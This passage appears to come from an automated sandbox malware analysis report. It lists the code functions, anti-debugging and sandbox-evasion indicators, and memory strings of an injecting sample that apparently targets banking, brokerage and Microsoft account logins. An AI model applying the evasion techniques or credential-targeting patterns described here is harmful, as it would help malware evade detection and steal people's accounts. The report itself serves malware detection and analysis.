            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A01366 push eax; iretd 2_2_03A01369
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E8404 push esi; ret 3_2_043E8409
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E64D0 push edi; retf 3_2_043E64D3
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E96F5 push edi; retf 3_2_043E9718
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E8739 push ds; retf 3_2_043E8751
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E8744 push ds; retf 3_2_043E8751
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EC9FC push C5503231h; retf 3_2_043ECA04
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EB25D push 00000030h; retf 3_2_043EB2AA
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EB29D push 00000030h; retf 3_2_043EB2AA
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeAPI/Special instruction interceptor: Address: 40D422C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9731Jump to behavior
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87183
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe TID: 3560Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316Thread sleep count: 242 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316Thread sleep time: -484000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316Thread sleep count: 9731 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6316Thread sleep time: -19462000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D5C2C0 FindFirstFileW,FindNextFileW,FindClose,5_2_02D5C2C0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt.microsoft.com/profileVMware20,11696487552u
            Source: 01194HH4.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 01194HH4.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtal.azure.comVMware20,116964875
            Source: 01194HH4.5.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 01194HH4.5.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 01194HH4.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 01194HH4.5.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696487552t
            Source: 01194HH4.5.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: URUrIrqwFu.exe, 00000003.00000002.3983201981.000000000076E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.3982015331.000000000311E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2764226566.000001CFDF1EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 01194HH4.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 01194HH4.5.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware
            Source: 01194HH4.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
            Source: 01194HH4.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 01194HH4.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 01194HH4.5.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 01194HH4.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 01194HH4.5.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: netbtugc.exe, 00000005.00000002.3987789894.0000000007FF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648
            Source: 01194HH4.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 01194HH4.5.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 01194HH4.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 01194HH4.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 01194HH4.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeAPI call chain: ExitProcess graph end nodegraph_0-86871
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7096E rdtsc 2_2_03A7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172B3 LdrLoadDll,2_2_004172B3
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_040D4498 mov eax, dword ptr fs:[00000030h]0_2_040D4498
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_040D44F8 mov eax, dword ptr fs:[00000030h]0_2_040D44F8
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_040D2E78 mov eax, dword ptr fs:[00000030h]0_2_040D2E78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov ecx, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE3DB mov eax, dword ptr fs:[00000030h]2_2_03ADE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD43D4 mov eax, dword ptr fs:[00000030h]2_2_03AD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov ecx, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B08324 mov eax, dword ptr fs:[00000030h]2_2_03B08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD8350 mov ecx, dword ptr fs:[00000030h]2_2_03AD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0634F mov eax, dword ptr fs:[00000030h]2_2_03B0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B062D6 mov eax, dword ptr fs:[00000030h]2_2_03B062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
